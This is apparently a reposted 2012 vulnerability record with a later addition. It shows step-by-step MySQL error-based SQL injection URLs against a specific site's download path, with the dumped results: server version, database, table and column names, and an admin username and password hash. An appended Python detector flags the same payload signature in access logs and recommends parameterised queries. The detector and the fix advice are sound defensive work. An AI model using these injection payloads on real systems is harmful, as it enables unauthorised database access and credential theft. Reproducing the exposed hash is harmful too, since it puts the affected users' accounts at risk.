
php+mysql advanced error-based injection, tested and working

Posted on 2012-9-13 17:52:09
http://www.wooyun.org/bugs/wooyun-2010-01666

I had been looking for something to test this on and did not expect to find it here. It can be tested; this is just a record.

http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003

/data0/htdocs/leqi_new/app/myapp.php

Or

/**********version()**********/ 5.1.49-log
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********user()**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********database()**********/ leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********Dump database names one by one with limit**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
information_schema
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
test

/**********Dump table names one by one with limit**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
users

/**********Dump column names one by one with limit**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
user_id,username,nickname,passwd,group_id
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
11 21
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
11 341 351 361
/**********Dump data**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
admin
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
6a8b4574ca231eb8bd52764d4978ffcd
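
For defenders, every query recorded above shares one signature: floor(rand(0)*2) used as a GROUP BY key together with count(*). The following added example (not part of the original post) flags that combination in web access logs; the log format, the /search path, the IP addresses, timestamps and status codes are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Building blocks of the duplicate-key GROUP BY error query used in the post.
SIGNALS = {
    "floor_rand": re.compile(r"floor\s*\(\s*rand\s*\(\s*\d*\s*\)\s*\*\s*2\s*\)", re.I),
    "count_star": re.compile(r"count\s*\(\s*\*\s*\)", re.I),
    "group_by": re.compile(r"group\s+by\b", re.I),
    "info_schema": re.compile(r"information_schema\s*\.", re.I),
}
CORE = {"floor_rand", "count_star", "group_by"}  # all three must co-occur
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

def normalise(path):
    """Undo up to three layers of URL encoding and drop SQL comment delimiters."""
    for _ in range(3):
        decoded = unquote_plus(path)
        if decoded == path:
            break
        path = decoded
    path = re.sub(r"/\*!?\d*|\*/", " ", path)
    return re.sub(r"\s+", " ", path)

def classify(path):
    """Return (alert, sorted signal names) for one request path."""
    text = normalise(path)
    hits = {name for name, rx in SIGNALS.items() if rx.search(text)}
    return CORE <= hits, sorted(hits)

def scan(log_text):
    """Return (client, status, signals) for each log line that trips the rule."""
    alerts = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if m:
            alert, hits = classify(m.group(2))
            if alert:
                alerts.append((m.group(1), int(m.group(3)), hits))
    return alerts

# Constructed sample log: documentation IPs, made-up timestamps and statuses.
SAMPLE_LOG = """\
203.0.113.5 - - [13/Sep/2012:17:40:01 +0800] "GET /download/downpage/netarea/id/1600003/wapc/5000_0005_003 HTTP/1.1" 200 5120
198.51.100.7 - - [13/Sep/2012:17:41:12 +0800] "GET /download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003 HTTP/1.1" 500 312
198.51.100.23 - - [13/Sep/2012:17:42:30 +0800] "GET /download/downpage/netarea/id/1600003%27%20or%201=%28select%201%20from%20%28select%20count%28*%29,concat%28%28SELECT%20user%28%29%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23/wapc/5000_0005_003 HTTP/1.1" 500 312
203.0.113.9 - - [13/Sep/2012:17:43:02 +0800] "GET /search?q=group+by+count(*)+tutorial HTTP/1.1" 200 2048
"""

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

Detection is a backstop: the fix for the flaw recorded above is to bind the id path segment as a query parameter and to stop returning MySQL error text to the client.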